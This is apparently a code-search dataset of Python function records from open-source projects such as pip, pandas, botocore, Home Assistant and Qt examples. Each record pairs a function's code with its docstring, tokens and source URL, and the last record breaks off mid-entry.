https://github.com/bruderstein/PythonScript/blob/df9f7071ddf3a079e3a301b9b53a6dc78cf1208f/PythonScript/src/CreateWrapper.py#L894-L896
linxid/Machine_Learning_Study_Path
558e82d13237114bbb8152483977806fc0c222af
Machine Learning In Action/Chapter8-Regression/venv/Lib/site-packages/pip-9.0.1-py3.6.egg/pip/_vendor/lockfile/sqlitelockfile.py
python
SQLiteLockFile.acquire
(self, timeout=None)
[]
def acquire(self, timeout=None): timeout = timeout if timeout is not None else self.timeout end_time = time.time() if timeout is not None and timeout > 0: end_time += timeout if timeout is None: wait = 0.1 elif timeout <= 0: wait = 0 else: wait = timeout / 10 cursor = self.connection.cursor() while True: if not self.is_locked(): # Not locked. Try to lock it. cursor.execute("insert into locks" " (lock_file, unique_name)" " values" " (?, ?)", (self.lock_file, self.unique_name)) self.connection.commit() # Check to see if we are the only lock holder. cursor.execute("select * from locks" " where unique_name = ?", (self.unique_name,)) rows = cursor.fetchall() if len(rows) > 1: # Nope. Someone else got there. Remove our lock. cursor.execute("delete from locks" " where unique_name = ?", (self.unique_name,)) self.connection.commit() else: # Yup. We're done, so go home. return else: # Check to see if we are the only lock holder. cursor.execute("select * from locks" " where unique_name = ?", (self.unique_name,)) rows = cursor.fetchall() if len(rows) == 1: # We're the locker, so go home. return # Maybe we should wait a bit longer. if timeout is not None and time.time() > end_time: if timeout > 0: # No more waiting. raise LockTimeout("Timeout waiting to acquire" " lock for %s" % self.path) else: # Someone else has the lock and we are impatient.. raise AlreadyLocked("%s is already locked" % self.path) # Well, okay. We'll give it a bit longer. time.sleep(wait)
[ "def", "acquire", "(", "self", ",", "timeout", "=", "None", ")", ":", "timeout", "=", "timeout", "if", "timeout", "is", "not", "None", "else", "self", ".", "timeout", "end_time", "=", "time", ".", "time", "(", ")", "if", "timeout", "is", "not", "None...
https://github.com/linxid/Machine_Learning_Study_Path/blob/558e82d13237114bbb8152483977806fc0c222af/Machine Learning In Action/Chapter8-Regression/venv/Lib/site-packages/pip-9.0.1-py3.6.egg/pip/_vendor/lockfile/sqlitelockfile.py#L53-L114
DingGuodong/LinuxBashShellScriptForOps
d5727b985f920292a10698a3c9751d5dff5fc1a3
projects/LinuxSystemOps/AutoDevOps/Fabric/Fabric2.x/fabric2-application-template-for-root.py
python
is_apt
()
:return:
:return:
[ ":", "return", ":" ]
def is_apt(): """ :return: """ run_result = cxn.run('command -v apt', hide=True, warn=True) if run_result.ok: return True else: return False
[ "def", "is_apt", "(", ")", ":", "run_result", "=", "cxn", ".", "run", "(", "'command -v apt'", ",", "hide", "=", "True", ",", "warn", "=", "True", ")", "if", "run_result", ".", "ok", ":", "return", "True", "else", ":", "return", "False" ]
https://github.com/DingGuodong/LinuxBashShellScriptForOps/blob/d5727b985f920292a10698a3c9751d5dff5fc1a3/projects/LinuxSystemOps/AutoDevOps/Fabric/Fabric2.x/fabric2-application-template-for-root.py#L119-L127
naftaliharris/tauthon
5587ceec329b75f7caf6d65a036db61ac1bae214
Lib/uuid.py
python
_netbios_getnode
()
Get the hardware address on Windows using NetBIOS calls. See http://support.microsoft.com/kb/118623 for details.
Get the hardware address on Windows using NetBIOS calls. See http://support.microsoft.com/kb/118623 for details.
[ "Get", "the", "hardware", "address", "on", "Windows", "using", "NetBIOS", "calls", ".", "See", "http", ":", "//", "support", ".", "microsoft", ".", "com", "/", "kb", "/", "118623", "for", "details", "." ]
def _netbios_getnode(): """Get the hardware address on Windows using NetBIOS calls. See http://support.microsoft.com/kb/118623 for details.""" import win32wnet, netbios ncb = netbios.NCB() ncb.Command = netbios.NCBENUM ncb.Buffer = adapters = netbios.LANA_ENUM() adapters._pack() if win32wnet.Netbios(ncb) != 0: return adapters._unpack() for i in range(adapters.length): ncb.Reset() ncb.Command = netbios.NCBRESET ncb.Lana_num = ord(adapters.lana[i]) if win32wnet.Netbios(ncb) != 0: continue ncb.Reset() ncb.Command = netbios.NCBASTAT ncb.Lana_num = ord(adapters.lana[i]) ncb.Callname = '*'.ljust(16) ncb.Buffer = status = netbios.ADAPTER_STATUS() if win32wnet.Netbios(ncb) != 0: continue status._unpack() bytes = map(ord, status.adapter_address) return ((bytes[0]<<40L) + (bytes[1]<<32L) + (bytes[2]<<24L) + (bytes[3]<<16L) + (bytes[4]<<8L) + bytes[5])
[ "def", "_netbios_getnode", "(", ")", ":", "import", "win32wnet", ",", "netbios", "ncb", "=", "netbios", ".", "NCB", "(", ")", "ncb", ".", "Command", "=", "netbios", ".", "NCBENUM", "ncb", ".", "Buffer", "=", "adapters", "=", "netbios", ".", "LANA_ENUM", ...
https://github.com/naftaliharris/tauthon/blob/5587ceec329b75f7caf6d65a036db61ac1bae214/Lib/uuid.py#L425-L452
huggingface/transformers
623b4f7c63f60cce917677ee704d6c93ee960b4b
examples/research_projects/visual_bert/modeling_frcnn.py
python
RPNOutputs.__init__
( self, box2box_transform, anchor_matcher, batch_size_per_image, positive_fraction, images, pred_objectness_logits, pred_anchor_deltas, anchors, boundary_threshold=0, gt_boxes=None, smooth_l1_beta=0.0, )
Args: box2box_transform (Box2BoxTransform): :class:`Box2BoxTransform` instance for anchor-proposal transformations. anchor_matcher (Matcher): :class:`Matcher` instance for matching anchors to ground-truth boxes; used to determine training labels. batch_size_per_image (int): number of proposals to sample when training positive_fraction (float): target fraction of sampled proposals that should be positive images (ImageList): :class:`ImageList` instance representing N input images pred_objectness_logits (list[Tensor]): A list of L elements. Element i is a tensor of shape (N, A, Hi, W) pred_anchor_deltas (list[Tensor]): A list of L elements. Element i is a tensor of shape (N, A*4, Hi, Wi) anchors (list[torch.Tensor]): nested list of boxes. anchors[i][j] at (n, l) stores anchor array for feature map l boundary_threshold (int): if >= 0, then anchors that extend beyond the image boundary by more than boundary_thresh are not used in training. gt_boxes (list[Boxes], optional): A list of N elements. smooth_l1_beta (float): The transition point between L1 and L2 lossn. When set to 0, the loss becomes L1. When +inf, it is ignored
Args: box2box_transform (Box2BoxTransform): :class:`Box2BoxTransform` instance for anchor-proposal transformations. anchor_matcher (Matcher): :class:`Matcher` instance for matching anchors to ground-truth boxes; used to determine training labels. batch_size_per_image (int): number of proposals to sample when training positive_fraction (float): target fraction of sampled proposals that should be positive images (ImageList): :class:`ImageList` instance representing N input images pred_objectness_logits (list[Tensor]): A list of L elements. Element i is a tensor of shape (N, A, Hi, W) pred_anchor_deltas (list[Tensor]): A list of L elements. Element i is a tensor of shape (N, A*4, Hi, Wi) anchors (list[torch.Tensor]): nested list of boxes. anchors[i][j] at (n, l) stores anchor array for feature map l boundary_threshold (int): if >= 0, then anchors that extend beyond the image boundary by more than boundary_thresh are not used in training. gt_boxes (list[Boxes], optional): A list of N elements. smooth_l1_beta (float): The transition point between L1 and L2 lossn. When set to 0, the loss becomes L1. When +inf, it is ignored
[ "Args", ":", "box2box_transform", "(", "Box2BoxTransform", ")", ":", ":", "class", ":", "Box2BoxTransform", "instance", "for", "anchor", "-", "proposal", "transformations", ".", "anchor_matcher", "(", "Matcher", ")", ":", ":", "class", ":", "Matcher", "instance"...
def __init__( self, box2box_transform, anchor_matcher, batch_size_per_image, positive_fraction, images, pred_objectness_logits, pred_anchor_deltas, anchors, boundary_threshold=0, gt_boxes=None, smooth_l1_beta=0.0, ): """ Args: box2box_transform (Box2BoxTransform): :class:`Box2BoxTransform` instance for anchor-proposal transformations. anchor_matcher (Matcher): :class:`Matcher` instance for matching anchors to ground-truth boxes; used to determine training labels. batch_size_per_image (int): number of proposals to sample when training positive_fraction (float): target fraction of sampled proposals that should be positive images (ImageList): :class:`ImageList` instance representing N input images pred_objectness_logits (list[Tensor]): A list of L elements. Element i is a tensor of shape (N, A, Hi, W) pred_anchor_deltas (list[Tensor]): A list of L elements. Element i is a tensor of shape (N, A*4, Hi, Wi) anchors (list[torch.Tensor]): nested list of boxes. anchors[i][j] at (n, l) stores anchor array for feature map l boundary_threshold (int): if >= 0, then anchors that extend beyond the image boundary by more than boundary_thresh are not used in training. gt_boxes (list[Boxes], optional): A list of N elements. smooth_l1_beta (float): The transition point between L1 and L2 lossn. When set to 0, the loss becomes L1. When +inf, it is ignored """ self.box2box_transform = box2box_transform self.anchor_matcher = anchor_matcher self.batch_size_per_image = batch_size_per_image self.positive_fraction = positive_fraction self.pred_objectness_logits = pred_objectness_logits self.pred_anchor_deltas = pred_anchor_deltas self.anchors = anchors self.gt_boxes = gt_boxes self.num_feature_maps = len(pred_objectness_logits) self.num_images = len(images) self.boundary_threshold = boundary_threshold self.smooth_l1_beta = smooth_l1_beta
[ "def", "__init__", "(", "self", ",", "box2box_transform", ",", "anchor_matcher", ",", "batch_size_per_image", ",", "positive_fraction", ",", "images", ",", "pred_objectness_logits", ",", "pred_anchor_deltas", ",", "anchors", ",", "boundary_threshold", "=", "0", ",", ...
https://github.com/huggingface/transformers/blob/623b4f7c63f60cce917677ee704d6c93ee960b4b/examples/research_projects/visual_bert/modeling_frcnn.py#L627-L667
yandexdataschool/AgentNet
c28b99f11eb5d1c9080c2368f387b2cc4942adc3
agentnet/objective/base.py
python
BaseObjective.get_reward
(self, last_environment_states, agent_actions, batch_id)
WARNING! This function is computed on a single session, not on a batch! Reward given for taking the action in current environment state. :param last_environment_states: Environment state before taking action. :type last_environment_states: float[time_i, memory_id] :param agent_actions: Agent action at this tick. :type agent_actions: int[time_i] :param batch_id: Session id. :type batch_id: int :return: Reward for taking action. :rtype: float[time_i]
WARNING! This function is computed on a single session, not on a batch! Reward given for taking the action in current environment state.
[ "WARNING!", "This", "function", "is", "computed", "on", "a", "single", "session", "not", "on", "a", "batch!", "Reward", "given", "for", "taking", "the", "action", "in", "current", "environment", "state", "." ]
def get_reward(self, last_environment_states, agent_actions, batch_id): """WARNING! This function is computed on a single session, not on a batch! Reward given for taking the action in current environment state. :param last_environment_states: Environment state before taking action. :type last_environment_states: float[time_i, memory_id] :param agent_actions: Agent action at this tick. :type agent_actions: int[time_i] :param batch_id: Session id. :type batch_id: int :return: Reward for taking action. :rtype: float[time_i] """ raise NotImplementedError
[ "def", "get_reward", "(", "self", ",", "last_environment_states", ",", "agent_actions", ",", "batch_id", ")", ":", "raise", "NotImplementedError" ]
https://github.com/yandexdataschool/AgentNet/blob/c28b99f11eb5d1c9080c2368f387b2cc4942adc3/agentnet/objective/base.py#L19-L36
home-assistant/core
265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1
homeassistant/components/zabbix/__init__.py
python
setup
(hass: HomeAssistant, config: ConfigType)
return True
Set up the Zabbix component.
Set up the Zabbix component.
[ "Set", "up", "the", "Zabbix", "component", "." ]
def setup(hass: HomeAssistant, config: ConfigType) -> bool: """Set up the Zabbix component.""" conf = config[DOMAIN] protocol = "https" if conf[CONF_SSL] else "http" url = urljoin(f"{protocol}://{conf[CONF_HOST]}", conf[CONF_PATH]) username = conf.get(CONF_USERNAME) password = conf.get(CONF_PASSWORD) publish_states_host = conf.get(CONF_PUBLISH_STATES_HOST) entities_filter = convert_include_exclude_filter(conf) try: zapi = ZabbixAPI(url=url, user=username, password=password) _LOGGER.info("Connected to Zabbix API Version %s", zapi.api_version()) except ZabbixAPIException as login_exception: _LOGGER.error("Unable to login to the Zabbix API: %s", login_exception) return False except HTTPError as http_error: _LOGGER.error("HTTPError when connecting to Zabbix API: %s", http_error) zapi = None _LOGGER.error(RETRY_MESSAGE, http_error) event_helper.call_later(hass, RETRY_INTERVAL, lambda _: setup(hass, config)) return True hass.data[DOMAIN] = zapi def event_to_metrics(event, float_keys, string_keys): """Add an event to the outgoing Zabbix list.""" state = event.data.get("new_state") if state is None or state.state in (STATE_UNKNOWN, "", STATE_UNAVAILABLE): return entity_id = state.entity_id if not entities_filter(entity_id): return floats = {} strings = {} try: _state_as_value = float(state.state) floats[entity_id] = _state_as_value except ValueError: try: _state_as_value = float(state_helper.state_as_number(state)) floats[entity_id] = _state_as_value except ValueError: strings[entity_id] = state.state for key, value in state.attributes.items(): # For each value we try to cast it as float # But if we can not do it we store the value # as string attribute_id = f"{entity_id}/{key}" try: float_value = float(value) except (ValueError, TypeError): float_value = None if float_value is None or not math.isfinite(float_value): strings[attribute_id] = str(value) else: floats[attribute_id] = float_value metrics = [] float_keys_count = len(float_keys) float_keys.update(floats) if len(float_keys) != float_keys_count: floats_discovery = [] for float_key in float_keys: floats_discovery.append({"{#KEY}": float_key}) metric = ZabbixMetric( publish_states_host, "homeassistant.floats_discovery", json.dumps(floats_discovery), ) metrics.append(metric) for key, value in floats.items(): metric = ZabbixMetric( publish_states_host, f"homeassistant.float[{key}]", value ) metrics.append(metric) string_keys.update(strings) return metrics if publish_states_host: zabbix_sender = ZabbixSender(zabbix_server=conf[CONF_HOST]) instance = ZabbixThread(hass, zabbix_sender, event_to_metrics) instance.setup(hass) return True
[ "def", "setup", "(", "hass", ":", "HomeAssistant", ",", "config", ":", "ConfigType", ")", "->", "bool", ":", "conf", "=", "config", "[", "DOMAIN", "]", "protocol", "=", "\"https\"", "if", "conf", "[", "CONF_SSL", "]", "else", "\"http\"", "url", "=", "u...
https://github.com/home-assistant/core/blob/265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1/homeassistant/components/zabbix/__init__.py#L69-L161
boto/botocore
f36f59394263539ed31f5a8ceb552a85354a552c
botocore/eventstream.py
python
DecodeUtils.unpack_int8
(data)
return value, 1
Parse a signed 8-bit integer from the bytes. :type data: bytes :param data: The bytes to parse from. :rtype: (int, int) :returns: A tuple containing the (parsed integer value, bytes consumed)
Parse a signed 8-bit integer from the bytes.
[ "Parse", "a", "signed", "8", "-", "bit", "integer", "from", "the", "bytes", "." ]
def unpack_int8(data): """Parse a signed 8-bit integer from the bytes. :type data: bytes :param data: The bytes to parse from. :rtype: (int, int) :returns: A tuple containing the (parsed integer value, bytes consumed) """ value = unpack(DecodeUtils.INT8_BYTE_FORMAT, data[:1])[0] return value, 1
[ "def", "unpack_int8", "(", "data", ")", ":", "value", "=", "unpack", "(", "DecodeUtils", ".", "INT8_BYTE_FORMAT", ",", "data", "[", ":", "1", "]", ")", "[", "0", "]", "return", "value", ",", "1" ]
https://github.com/boto/botocore/blob/f36f59394263539ed31f5a8ceb552a85354a552c/botocore/eventstream.py#L152-L162
pandas-dev/pandas
5ba7d714014ae8feaccc0dd4a98890828cf2832d
pandas/core/arrays/categorical.py
python
Categorical._values_for_rank
(self)
return values
For correctly ranking ordered categorical data. See GH#15420 Ordered categorical data should be ranked on the basis of codes with -1 translated to NaN. Returns ------- numpy.array
For correctly ranking ordered categorical data. See GH#15420
[ "For", "correctly", "ranking", "ordered", "categorical", "data", ".", "See", "GH#15420" ]
def _values_for_rank(self): """ For correctly ranking ordered categorical data. See GH#15420 Ordered categorical data should be ranked on the basis of codes with -1 translated to NaN. Returns ------- numpy.array """ from pandas import Series if self.ordered: values = self.codes mask = values == -1 if mask.any(): values = values.astype("float64") values[mask] = np.nan elif self.categories.is_numeric(): values = np.array(self) else: # reorder the categories (so rank can use the float codes) # instead of passing an object array to rank values = np.array( self.rename_categories(Series(self.categories).rank().values) ) return values
[ "def", "_values_for_rank", "(", "self", ")", ":", "from", "pandas", "import", "Series", "if", "self", ".", "ordered", ":", "values", "=", "self", ".", "codes", "mask", "=", "values", "==", "-", "1", "if", "mask", ".", "any", "(", ")", ":", "values", ...
https://github.com/pandas-dev/pandas/blob/5ba7d714014ae8feaccc0dd4a98890828cf2832d/pandas/core/arrays/categorical.py#L1878-L1906
flexxui/flexx
69b85b308b505a8621305458a5094f2a6addd720
flexx/app/bsdf_lite.py
python
BsdfLiteSerializer.load
(self, f)
return self._decode(f)
Load a BSDF-encoded object from the given file object.
Load a BSDF-encoded object from the given file object.
[ "Load", "a", "BSDF", "-", "encoded", "object", "from", "the", "given", "file", "object", "." ]
def load(self, f): """ Load a BSDF-encoded object from the given file object. """ # Check magic string if f.read(4) != b'BSDF': raise RuntimeError('This does not look a BSDF file.') # Check version major_version = strunpack('<B', f.read(1))[0] minor_version = strunpack('<B', f.read(1))[0] file_version = '%i.%i' % (major_version, minor_version) if major_version != VERSION[0]: # major version should be 2 t = ('Reading file with different major version (%s) ' 'from the implementation (%s).') raise RuntimeError(t % (file_version, __version__)) if minor_version > VERSION[1]: # minor should be < ours t = ('BSDF warning: reading file with higher minor version (%s) ' 'than the implementation (%s).') logger.warning(t % (file_version, __version__)) return self._decode(f)
[ "def", "load", "(", "self", ",", "f", ")", ":", "# Check magic string", "if", "f", ".", "read", "(", "4", ")", "!=", "b'BSDF'", ":", "raise", "RuntimeError", "(", "'This does not look a BSDF file.'", ")", "# Check version", "major_version", "=", "strunpack", "...
https://github.com/flexxui/flexx/blob/69b85b308b505a8621305458a5094f2a6addd720/flexx/app/bsdf_lite.py#L415-L434
haiwen/seafile-docker
2d2461d4c8cab3458ec9832611c419d47506c300
scripts/upgrade.py
python
fix_media_symlinks
(current_version)
If the container was recreated and it's not a minor/major upgrade, we need to fix the media/avatars and media/custom symlink.
If the container was recreated and it's not a minor/major upgrade, we need to fix the media/avatars and media/custom symlink.
[ "If", "the", "container", "was", "recreated", "and", "it", "s", "not", "a", "minor", "/", "major", "upgrade", "we", "need", "to", "fix", "the", "media", "/", "avatars", "and", "media", "/", "custom", "symlink", "." ]
def fix_media_symlinks(current_version): """ If the container was recreated and it's not a minor/major upgrade, we need to fix the media/avatars and media/custom symlink. """ media_dir = join( installdir, 'seafile-server-{}/seahub/media'.format(current_version) ) avatars_dir = join(media_dir, 'avatars') if not islink(avatars_dir): logger.info('The container was recreated, running minor-upgrade.sh to fix the media symlinks') run_minor_upgrade(current_version)
[ "def", "fix_media_symlinks", "(", "current_version", ")", ":", "media_dir", "=", "join", "(", "installdir", ",", "'seafile-server-{}/seahub/media'", ".", "format", "(", "current_version", ")", ")", "avatars_dir", "=", "join", "(", "media_dir", ",", "'avatars'", ")...
https://github.com/haiwen/seafile-docker/blob/2d2461d4c8cab3458ec9832611c419d47506c300/scripts/upgrade.py#L67-L79
chartbeat-labs/textacy
40cd12fe953ef8be5958cff93ad8762262f3b757
src/textacy/tokenizers/terms.py
python
_concat_extract_ngrams
(doclike: types.DocLike, ns: Collection[int])
[]
def _concat_extract_ngrams(doclike: types.DocLike, ns: Collection[int]) -> Iterable[Span]: for n in ns: ngrams = extract.ngrams(doclike, n=n) for ngram in ngrams: yield ngram
[ "def", "_concat_extract_ngrams", "(", "doclike", ":", "types", ".", "DocLike", ",", "ns", ":", "Collection", "[", "int", "]", ")", "->", "Iterable", "[", "Span", "]", ":", "for", "n", "in", "ns", ":", "ngrams", "=", "extract", ".", "ngrams", "(", "do...
https://github.com/chartbeat-labs/textacy/blob/40cd12fe953ef8be5958cff93ad8762262f3b757/src/textacy/tokenizers/terms.py#L144-L148
XKNX/xknx
1deeeb3dc0978aebacf14492a84e1f1eaf0970ed
xknx/devices/cover.py
python
Cover.auto_stop_if_necessary
(self)
Do auto stop if necessary.
Do auto stop if necessary.
[ "Do", "auto", "stop", "if", "necessary", "." ]
async def auto_stop_if_necessary(self) -> None: """Do auto stop if necessary.""" # If device does not support auto_positioning, # we have to stop the device when position is reached, # unless device was traveling to fully open # or fully closed state. if ( self.supports_stop and not self.position_target.writable and self.position_reached() and not self.is_open() and not self.is_closed() ): await self.stop()
[ "async", "def", "auto_stop_if_necessary", "(", "self", ")", "->", "None", ":", "# If device does not support auto_positioning,", "# we have to stop the device when position is reached,", "# unless device was traveling to fully open", "# or fully closed state.", "if", "(", "self", "."...
https://github.com/XKNX/xknx/blob/1deeeb3dc0978aebacf14492a84e1f1eaf0970ed/xknx/devices/cover.py#L258-L271
home-assistant/core
265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1
homeassistant/components/nuheat/climate.py
python
NuHeatThermostat.hvac_modes
(self)
return OPERATION_LIST
Return list of possible operation modes.
Return list of possible operation modes.
[ "Return", "list", "of", "possible", "operation", "modes", "." ]
def hvac_modes(self): """Return list of possible operation modes.""" return OPERATION_LIST
[ "def", "hvac_modes", "(", "self", ")", ":", "return", "OPERATION_LIST" ]
https://github.com/home-assistant/core/blob/265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1/homeassistant/components/nuheat/climate.py#L187-L189
pyqt/examples
843bb982917cecb2350b5f6d7f42c9b7fb142ec1
src/pyqt-official/itemviews/frozencolumn/frozencolumn.py
python
FreezeTableWidget.init
(self)
[]
def init(self): self.frozenTableView.setModel(self.model()) self.frozenTableView.setFocusPolicy(Qt.NoFocus) self.frozenTableView.verticalHeader().hide() self.frozenTableView.horizontalHeader().setSectionResizeMode( QHeaderView.Fixed) self.viewport().stackUnder(self.frozenTableView) self.frozenTableView.setStyleSheet(''' QTableView { border: none; background-color: #8EDE21; selection-background-color: #999; }''') # for demo purposes self.frozenTableView.setSelectionModel(self.selectionModel()) for col in range(1, self.model().columnCount()): self.frozenTableView.setColumnHidden(col, True) self.frozenTableView.setColumnWidth(0, self.columnWidth(0)) self.frozenTableView.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff) self.frozenTableView.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff) self.frozenTableView.show() self.updateFrozenTableGeometry() self.setHorizontalScrollMode(self.ScrollPerPixel) self.setVerticalScrollMode(self.ScrollPerPixel) self.frozenTableView.setVerticalScrollMode(self.ScrollPerPixel)
[ "def", "init", "(", "self", ")", ":", "self", ".", "frozenTableView", ".", "setModel", "(", "self", ".", "model", "(", ")", ")", "self", ".", "frozenTableView", ".", "setFocusPolicy", "(", "Qt", ".", "NoFocus", ")", "self", ".", "frozenTableView", ".", ...
https://github.com/pyqt/examples/blob/843bb982917cecb2350b5f6d7f42c9b7fb142ec1/src/pyqt-official/itemviews/frozencolumn/frozencolumn.py#L72-L96
yuxiaokui/Intranet-Penetration
f57678a204840c83cbf3308e3470ae56c5ff514b
proxy/XX-Net/code/default/python27/1.0/lib/codecs.py
python
make_encoding_map
(decoding_map)
return m
Creates an encoding map from a decoding map. If a target mapping in the decoding map occurs multiple times, then that target is mapped to None (undefined mapping), causing an exception when encountered by the charmap codec during translation. One example where this happens is cp875.py which decodes multiple character to \\u001a.
Creates an encoding map from a decoding map.
[ "Creates", "an", "encoding", "map", "from", "a", "decoding", "map", "." ]
def make_encoding_map(decoding_map): """ Creates an encoding map from a decoding map. If a target mapping in the decoding map occurs multiple times, then that target is mapped to None (undefined mapping), causing an exception when encountered by the charmap codec during translation. One example where this happens is cp875.py which decodes multiple character to \\u001a. """ m = {} for k,v in decoding_map.items(): if not v in m: m[v] = k else: m[v] = None return m
[ "def", "make_encoding_map", "(", "decoding_map", ")", ":", "m", "=", "{", "}", "for", "k", ",", "v", "in", "decoding_map", ".", "items", "(", ")", ":", "if", "not", "v", "in", "m", ":", "m", "[", "v", "]", "=", "k", "else", ":", "m", "[", "v"...
https://github.com/yuxiaokui/Intranet-Penetration/blob/f57678a204840c83cbf3308e3470ae56c5ff514b/proxy/XX-Net/code/default/python27/1.0/lib/codecs.py#L1062-L1081
gem/oq-engine
1bdb88f3914e390abcbd285600bfd39477aae47c
openquake/hmtk/faults/mfd/anderson_luco_area_mmax.py
python
Type3RecurrenceModel._get_a3_value
(bbar, dbar, slip, beta, mmax)
return (dbar * (dbar - bbar) / (bbar ** 2.)) * (slip / beta) *\ np.exp(-(dbar / 2.) * mmax)
Returns the A3 value defined in III.4 (Table 4)
Returns the A3 value defined in III.4 (Table 4)
[ "Returns", "the", "A3", "value", "defined", "in", "III", ".", "4", "(", "Table", "4", ")" ]
def _get_a3_value(bbar, dbar, slip, beta, mmax): """ Returns the A3 value defined in III.4 (Table 4) """ return (dbar * (dbar - bbar) / (bbar ** 2.)) * (slip / beta) *\ np.exp(-(dbar / 2.) * mmax)
[ "def", "_get_a3_value", "(", "bbar", ",", "dbar", ",", "slip", ",", "beta", ",", "mmax", ")", ":", "return", "(", "dbar", "*", "(", "dbar", "-", "bbar", ")", "/", "(", "bbar", "**", "2.", ")", ")", "*", "(", "slip", "/", "beta", ")", "*", "np...
https://github.com/gem/oq-engine/blob/1bdb88f3914e390abcbd285600bfd39477aae47c/openquake/hmtk/faults/mfd/anderson_luco_area_mmax.py#L178-L183
leancloud/satori
701caccbd4fe45765001ca60435c0cb499477c03
satori-rules/plugin/libs/gevent/corecffi.py
python
loop.fork
(self, ref=True, priority=None)
return fork(self, ref, priority)
[]
def fork(self, ref=True, priority=None): return fork(self, ref, priority)
[ "def", "fork", "(", "self", ",", "ref", "=", "True", ",", "priority", "=", "None", ")", ":", "return", "fork", "(", "self", ",", "ref", ",", "priority", ")" ]
https://github.com/leancloud/satori/blob/701caccbd4fe45765001ca60435c0cb499477c03/satori-rules/plugin/libs/gevent/corecffi.py#L599-L600
niftools/blender_niftools_addon
fc28f567e1fa431ec6633cb2a138898136090b29
io_scene_niftools/operators/kf_export_op.py
python
KfExportOperator.execute
(self, context)
return KfExport(self, context).execute()
Execute the export operators: first constructs a :class:`~io_scene_niftools.nif_export.NifExport` instance and then calls its :meth:`~io_scene_niftools.nif_export.NifExport.execute` method.
Execute the export operators: first constructs a :class:`~io_scene_niftools.nif_export.NifExport` instance and then calls its :meth:`~io_scene_niftools.nif_export.NifExport.execute` method.
[ "Execute", "the", "export", "operators", ":", "first", "constructs", "a", ":", "class", ":", "~io_scene_niftools", ".", "nif_export", ".", "NifExport", "instance", "and", "then", "calls", "its", ":", "meth", ":", "~io_scene_niftools", ".", "nif_export", ".", "...
def execute(self, context): """Execute the export operators: first constructs a :class:`~io_scene_niftools.nif_export.NifExport` instance and then calls its :meth:`~io_scene_niftools.nif_export.NifExport.execute` method. """ return KfExport(self, context).execute()
[ "def", "execute", "(", "self", ",", "context", ")", ":", "return", "KfExport", "(", "self", ",", "context", ")", ".", "execute", "(", ")" ]
https://github.com/niftools/blender_niftools_addon/blob/fc28f567e1fa431ec6633cb2a138898136090b29/io_scene_niftools/operators/kf_export_op.py#L64-L70
jeffh/sniffer
8d4a097fa1b006479d92367a8fcc8c4b71af57f9
sniffer/scanner/base.py
python
PollingScanner._is_new
(self, filepath)
return filepath not in self._watched_files
Returns True if file is not already on the watch list.
Returns True if file is not already on the watch list.
[ "Returns", "True", "if", "file", "is", "not", "already", "on", "the", "watch", "list", "." ]
def _is_new(self, filepath): """Returns True if file is not already on the watch list.""" return filepath not in self._watched_files
[ "def", "_is_new", "(", "self", ",", "filepath", ")", ":", "return", "filepath", "not", "in", "self", ".", "_watched_files" ]
https://github.com/jeffh/sniffer/blob/8d4a097fa1b006479d92367a8fcc8c4b71af57f9/sniffer/scanner/base.py#L256-L258
mtianyan/VueDjangoAntdProBookShop
fd8fa2151c81edde2f8b8e6df8e1ddd799f940c2
third_party/social_core/backends/microsoft.py
python
MicrosoftOAuth2.get_auth_token
(self, user_id)
return access_token
Return the access token for the given user, after ensuring that it has not expired, or refreshing it if so.
Return the access token for the given user, after ensuring that it has not expired, or refreshing it if so.
[ "Return", "the", "access", "token", "for", "the", "given", "user", "after", "ensuring", "that", "it", "has", "not", "expired", "or", "refreshing", "it", "if", "so", "." ]
def get_auth_token(self, user_id): """Return the access token for the given user, after ensuring that it has not expired, or refreshing it if so.""" user = self.get_user(user_id=user_id) access_token = user.social_user.access_token expires_on = user.social_user.extra_data['expires_on'] if expires_on <= int(time.time()): new_token_response = self.refresh_token(token=access_token) access_token = new_token_response['access_token'] return access_token
[ "def", "get_auth_token", "(", "self", ",", "user_id", ")", ":", "user", "=", "self", ".", "get_user", "(", "user_id", "=", "user_id", ")", "access_token", "=", "user", ".", "social_user", ".", "access_token", "expires_on", "=", "user", ".", "social_user", ...
https://github.com/mtianyan/VueDjangoAntdProBookShop/blob/fd8fa2151c81edde2f8b8e6df8e1ddd799f940c2/third_party/social_core/backends/microsoft.py#L69-L78
zhl2008/awd-platform
0416b31abea29743387b10b3914581fbe8e7da5e
web_flaskbb/lib/python2.7/site-packages/flask/config.py
python
ConfigAttribute.__init__
(self, name, get_converter=None)
[]
def __init__(self, name, get_converter=None): self.__name__ = name self.get_converter = get_converter
[ "def", "__init__", "(", "self", ",", "name", ",", "get_converter", "=", "None", ")", ":", "self", ".", "__name__", "=", "name", "self", ".", "get_converter", "=", "get_converter" ]
https://github.com/zhl2008/awd-platform/blob/0416b31abea29743387b10b3914581fbe8e7da5e/web_flaskbb/lib/python2.7/site-packages/flask/config.py#L24-L26
conjure-up/conjure-up
d2bf8ab8e71ff01321d0e691a8d3e3833a047678
conjureup/juju.py
python
get_credential
(cloud, cred_name=None)
Get credential Arguments: cloud: cloud applicable to user credentials cred_name: name of credential to get, or default
Get credential
[ "Get", "credential" ]
def get_credential(cloud, cred_name=None): """ Get credential Arguments: cloud: cloud applicable to user credentials cred_name: name of credential to get, or default """ creds = get_credentials() if cloud not in creds.keys(): return None cred = creds[cloud] default_credential = cred.pop('default-credential', None) cred.pop('default-region', None) if cred_name is not None and cred_name in cred.keys(): return cred[cred_name] elif default_credential is not None and default_credential in cred.keys(): return cred[default_credential] elif len(cred) == 1: return list(cred.values())[0] else: return None
[ "def", "get_credential", "(", "cloud", ",", "cred_name", "=", "None", ")", ":", "creds", "=", "get_credentials", "(", ")", "if", "cloud", "not", "in", "creds", ".", "keys", "(", ")", ":", "return", "None", "cred", "=", "creds", "[", "cloud", "]", "de...
https://github.com/conjure-up/conjure-up/blob/d2bf8ab8e71ff01321d0e691a8d3e3833a047678/conjureup/juju.py#L329-L352
ialbert/biostar-central
2dc7bd30691a50b2da9c2833ba354056bc686afa
biostar/forum/signals.py
python
check_spam
(sender, instance, created, **kwargs)
[]
def check_spam(sender, instance, created, **kwargs): # Classify post as spam/ham. tasks.spam_check.spool(uid=instance.uid)
